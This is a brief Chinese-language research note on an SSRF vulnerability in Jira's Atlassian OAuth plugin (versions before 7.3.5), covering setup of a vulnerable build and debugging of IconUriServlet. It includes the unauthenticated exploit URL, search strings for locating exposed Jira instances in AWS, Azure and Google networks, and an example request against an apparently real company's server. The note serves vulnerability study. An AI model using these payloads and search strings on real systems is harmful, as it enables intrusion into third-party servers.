受影响版本:
Jira < 7.3.5
jira安装参考:https://blog.csdn.net/caiqiiqi/article/details/89017806
安装jira-6.4.14版本:
https://product-downloads.atlassian.com/software/jira/downloads/atlassian-jira-6.4.14.tar.gz
漏洞点:Atlassian OAuth plugin
漏洞测试方法:不需要登录的情况下,访问
https://%basepath%/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.nl
参考:http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
调试
根据文章中的描述,漏洞点在:IconUriServlet。
从jar包中找字符串:
grep -irn "iconuri" `find .|grep .jar`
也可以定位到./atlassian-jira/WEB-INF/atlassian-bundled-plugins/atlassian-oauth-service-provider-plugin-1.9.8.jar
。
在atlassian-jira-6.4.14-standalone/atlassian-jira/WEB-INF/atlassian-bundled-plugins/atlassian-oauth-service-provider-plugin-1.9.8.jar!/com/atlassian/oauth/serviceprovider/internal/servlet/user/IconUriServlet.class
的doGet()
方法下断点。
9月7日更新:
参考:
https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-3-b0f5997e3739
https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a
https://medium.com/@zain.sabahat/exploiting-ssrf-like-a-boss-c090dc63d326
jira的特征:
X-AUSERNAME: anonymous
X-AUSERNAME: anonymous org:"Amazon.com" -- For aws
X-AUSERNAME: anonymous org:"Microsoft Azure" -- For Azure
X-AUSERNAME: anonymous org:"google" -- For Google
一些SSRF的例子:
https://jira.majesco.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.baidu.com
参考
- https://jira.atlassian.com/browse/JRASERVER-65862
- https://jira.atlassian.com/browse/CONFSERVER-53362